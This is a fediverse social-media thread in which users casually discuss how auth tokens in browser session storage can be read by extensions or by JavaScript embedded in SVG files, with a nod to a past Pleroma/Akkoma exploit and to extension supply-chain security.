Conversation

Notices

1. Embed this notice
   kaia (kaia@brotka.st)'s status on Friday, 31-Jan-2025 22:57:33 JST kaia
   friend showed me how to steal the auth token from the browser session storage, so I can use it against the REST API. interesting how one can just do that. a browser plugin could steal your session and it wouldn't even be visible to the user?
   • nyanide :nyancat_rainbow::nyancat_body::nyancat_face: likes this.
   • Embed this notice
     Slow Rodriguez (rocc@misskey.bubbletea.dev)'s status on Friday, 31-Jan-2025 23:07:13 JST Slow Rodriguez

     in reply to

     @kaia@brotka.st real thing

     kaia likes this.
   • Embed this notice
     snacks (snacks@netzsphaere.xyz)'s status on Friday, 31-Jan-2025 23:08:08 JST snacks

     in reply to
     @kaia that's how the svg exploit for pleroma and akkoma worked
     kaia likes this.
   • Embed this notice
     nyanide :nyancat_rainbow::nyancat_body::nyancat_face: (nyanide@lab.nyanide.com)'s status on Friday, 31-Jan-2025 23:09:58 JST nyanide :nyancat_rainbow::nyancat_body::nyancat_face:

     in reply to
     @kaia yeah, the plugin is arbitrary code no?
     kaia likes this.
   • Embed this notice
     nyanide :nyancat_rainbow::nyancat_body::nyancat_face: (nyanide@lab.nyanide.com)'s status on Friday, 31-Jan-2025 23:10:13 JST nyanide :nyancat_rainbow::nyancat_body::nyancat_face:

     in reply to

     • snacks
     @snacks @kaia it used a browser plugin for leverage?
     snacks likes this.
   • Embed this notice
     snacks (snacks@netzsphaere.xyz)'s status on Friday, 31-Jan-2025 23:12:51 JST snacks

     in reply to

     • nyanide :nyancat_rainbow::nyancat_body::nyancat_face:
     @nyanide @kaia no, svg can contain js
   • Embed this notice
     Nicro (nicro@fedi.absturztau.be)'s status on Friday, 31-Jan-2025 23:14:38 JST Nicro

     in reply to
     @kaia I wanted to get the user-data from one of my extensions in chromium, because it didn't have a backup-function. Dev-tools didn't have access to extension data at that time, so I installled an unrelated, third-party extension, that added that feature to the dev-tools console. :floofWoozy:
     kaia likes this.
   • Embed this notice
     ames (amelia@misskey.bubbletea.dev)'s status on Friday, 31-Jan-2025 23:14:42 JST ames

     in reply to

     @kaia@brotka.st yep and this is why malicious extensions and extension supply chain security are so important
     
     there's been a lot of effort to lock down browsers but a mildly privileged extension can blow right through 80% of that

     kaia likes this.
   • Embed this notice
     kirby (kirby@netzsphaere.xyz)'s status on Friday, 31-Jan-2025 23:15:07 JST kirby

     in reply to

     • snacks
     • nyanide :nyancat_rainbow::nyancat_body::nyancat_face:
     @snacks @nyanide @kaia and the browser just.. executes them? that doesn't sound realistic svg is an image format that's used fucking everywhere, you gotta sauce for that senator?
     kaia likes this.
   • Embed this notice
     snacks (snacks@netzsphaere.xyz)'s status on Friday, 31-Jan-2025 23:31:27 JST snacks

     in reply to

     • nyanide :nyancat_rainbow::nyancat_body::nyancat_face:
     • kirby
     @kirby @kaia @nyanide mdn links to this instead of elaborating themselves lol https://web.archive.org/web/20100223210744/http://wiki.svg.org/Inter-Document_Communication
   • Embed this notice
     Surströmming (selfhost arc) (xian@ak.kazuma.family)'s status on Saturday, 01-Feb-2025 02:53:52 JST Surströmming (selfhost arc)

     in reply to
     @kaia the dumb dolphin viruses for word sure have evolved huh
     kaia likes this.